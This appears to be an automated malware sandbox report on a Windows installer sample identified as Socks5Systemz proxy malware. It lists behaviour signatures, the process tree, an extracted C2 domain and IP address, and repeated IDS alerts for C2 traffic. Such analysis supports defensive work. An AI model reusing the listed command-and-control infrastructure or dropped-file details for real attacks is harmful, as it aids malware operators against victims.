
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1509605
MD5: 984c885de9fea28a60a25b278f424f50
SHA1: 5971c05829104cb0dd47de9fb8806762c141f081
SHA256: 5fe11452c901b9eb15809a33ecc6bb94c9d1ec87553708eac94ad19969cbaa8c
Tags: exe Socks5Systemz

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 984C885DE9FEA28A60A25B278F424F50)
    • file.tmp (PID: 6548 cmdline: "C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe" MD5: F02C8C4B73C31FD56FD90DC77235363B)
      • batchaviconverter32_64.exe (PID: 3220 cmdline: "C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -i MD5: 91646D419442B59CE172BCBAE8A2A8C9)
  • svchost.exe (PID: 7152 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 list": ["bwdroig.com"]}
Source | Rule | Description | Author | Strings
00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: batchaviconverter32_64.exe PID: 3220 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 7152, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-11T21:05:56.592753+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49694 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:56.945730+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49694 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:57.759019+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49695 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:58.587230+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49696 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:59.436703+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49698 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:59.808909+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49698 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:00.173237+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49698 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:04.025367+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49699 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:04.856670+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49700 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:05.212808+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49700 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:06.172922+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49701 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:07.015813+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:07.862918+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:08.685168+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:09.037740+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:09.851395+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49710 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:11.069617+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:11.896319+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:12.773663+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:13.605918+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:14.458614+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:15.308093+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:15.657816+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:16.511272+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:16.890327+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:17.260660+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:18.082965+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:18.905971+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49719 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:19.748752+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:20.096601+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:20.936229+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:21.296599+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:22.198017+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:22.998760+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49723 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:23.356736+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49723 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:23.709679+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49723 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:24.545349+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:24.913525+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:25.760563+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:26.218181+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:26.568628+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:27.422938+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:27.778832+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:28.137634+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:28.493940+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:29.319896+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:30.164158+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49728 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:31.118017+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49729 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:31.961080+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49730 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:33.084848+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:33.902633+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:34.288980+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:35.098906+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:35.918371+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49734 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:36.274434+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49734 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:37.246858+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:37.594424+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:37.940100+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:38.788211+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:39.632773+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:40.485386+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:40.839571+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:41.199616+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:41.796373+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:42.152596+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:42.687249+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:43.040861+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:43.864891+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:44.711438+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:45.545838+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:45.897834+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:46.723627+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:47.539506+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49743 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:48.660925+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:49.481618+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:50.341493+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49746 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:50.706826+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49746 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:51.549357+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49747 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:52.389623+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49748 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:53.198866+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49749 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:53.551402+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49749 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:54.402867+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49750 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:54.765378+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49750 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:55.585127+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:56.428401+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49752 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:57.264250+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49753 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:58.076172+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49754 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:58.906526+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49755 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:59.848506+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:00.991707+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49757 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:01.839737+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49758 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:02.669331+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49759 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:03.550461+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49760 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:04.444123+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49761 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:05.339435+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49762 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:06.175896+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49763 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:07.004269+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49764 | 185.196.8.214 | 80 | TCP

        AV Detection

Source: batchaviconverter32_64.exe.3220.3.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["bwdroig.com"]}
Source: file.exe | ReversingLabs: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, | 1_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0045D254 ArcFourCrypt, | 1_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_0045D23C ArcFourCrypt, | 1_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_10001000 ISCryptGetVersion, | 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_10001130 ArcFourCrypt, | 1_2_10001130

        Compliance

Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Unpacked PE file: 3.2.batchaviconverter32_64.exe.400000.0.unpack
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Batch AVI Converter_is1
Source: Binary string: msvcp71.pdbx# source: is-0D2S5.tmp.1.dr
Source: Binary string: msvcr71.pdb< source: is-O4BPT.tmp.1.dr
Source: Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-7PIOL.tmp.1.dr
Source: Binary string: msvcp71.pdb source: is-0D2S5.tmp.1.dr
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000002.3334319199.000000000068E000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091477293.0000000003140000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091585886.00000000021F8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3334991666.0000000002373000.00000002.00000001.01000000.00000007.sdmp, _isdecmp.dll.1.dr
Source: Binary string: msvcr71.pdb source: is-O4BPT.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError, | 1_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, | 1_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, | 1_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, | 1_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose, | 1_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, | 1_2_00463CDC

        Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49718 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49713 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49710 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49726 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49724 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49720 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49717 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49747 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49712 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49699 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49705 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49744 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49734 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49756 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49727 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49730 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49740 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49714 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49751 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49736 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49731 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49696 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49733 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49745 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49749 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49698 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49694 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49695 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49750 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49721 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49753 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49760 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49742 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49741 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49743 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49706 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49737 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49700 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49728 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49748 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49715 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49761 -> 185.196.8.214:80
